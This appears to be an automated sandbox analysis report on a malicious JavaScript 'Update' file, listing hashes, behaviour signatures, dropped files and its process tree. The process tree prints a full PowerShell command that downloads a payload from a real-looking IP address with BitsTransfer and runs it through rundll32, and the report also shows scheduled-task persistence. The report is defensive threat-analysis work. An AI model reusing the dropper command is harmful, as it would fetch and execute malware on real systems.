Resubmissions

15-08-2024 20:42

240815-zhg3jaxglr 10

14-06-2024 12:05

240614-n89dxszekb 10

28-05-2024 22:27

240528-2dhvdagb62 10

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    28-05-2024 22:27

General

  • Target

    Update_25_04_2024_3146918.js

  • Size

    135KB

  • MD5

    bf7f711e823916e5f56ff4d2286ee866

  • SHA1

    d9c9d093ce5f1cbc78280ab0232b5d6ef8c25729

  • SHA256

    0c9697506df18baac4b4215e78a43926ea4bb94ea3607c851a1c2fe3b5b31f17

  • SHA512

    842616018719df7c6ee7cac5996ea1399a2a459353ee96de2bf9fda122aac861baa0a5c848dad1d4aa756fab897d1e7a978eac359458d52801020685db67d941

  • SSDEEP

    1536:XDOApMn1gDmN2yBCn/yA3seAeLCMamLcInL1VXJ3Duvnr:6A+n1gDmNnw/yA3slMamLcInL7tDuvr

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89

Signatures

  • Blocklisted process makes network request 20 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 21 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Update_25_04_2024_3146918.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2080
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2632
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\olhqjgdh.q1a,Start
          4⤵
          • Drops file in Windows directory
          PID:2168
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {D1130CCC-10D6-44A5-92FB-0376B90242D1} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:620
    • C:\Windows\system32\rundll32.exe
      C:\Windows\system32\rundll32.exe "C:\ProgramData\RtlUpd\RtlUpd.dll",Start /p
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:2756

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    c9c483bcd5d3d73bd705d56469a8546d

    SHA1

    6a7d5eb09c12bf91e29e0cd133bc710f8a63b996

    SHA256

    54744466e8c259dee3830aef6995c36df8cefbe1afced15014a3a48f916f1c59

    SHA512

    7ae451d271aa2e74c8d04e08d06c1ffab8e27920d56a1295938fe5bf6d110dd0d93146a3cc83029d86fb73220cb32834fb5227520c8c27be027876f2cf09d653

  • \ProgramData\RtlUpd\RtlUpd.dll

    Filesize

    141KB

    MD5

    039ff182524d1f3c109869d5bee699a1

    SHA1

    9da43496bcb967ce77f18ed8a3ee19d53661e242

    SHA256

    a5f16fa960fe0461e2009bd748bc9057ef5cd31f05f48b12cfd7790fa741a24e

    SHA512

    3654009a9785e45488bb14cecea88a7a232976f003a32a9d5856572e491c580046629a3f0b2c130a1022a196677b1695643f7e2a457203233ba08fb13639317e

  • memory/2080-7-0x0000000002B00000-0x0000000002B32000-memory.dmp

    Filesize

    200KB

  • memory/2080-4-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

    Filesize

    4KB

  • memory/2080-8-0x0000000002B00000-0x0000000002B32000-memory.dmp

    Filesize

    200KB

  • memory/2080-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2080-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2080-11-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2080-12-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2080-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

    Filesize

    32KB

  • memory/2080-20-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

    Filesize

    9.6MB

  • memory/2080-5-0x000000001B690000-0x000000001B972000-memory.dmp

    Filesize

    2.9MB

  • memory/2632-18-0x000000001B610000-0x000000001B632000-memory.dmp

    Filesize

    136KB

  • memory/2632-19-0x0000000002AC0000-0x0000000002AD2000-memory.dmp

    Filesize

    72KB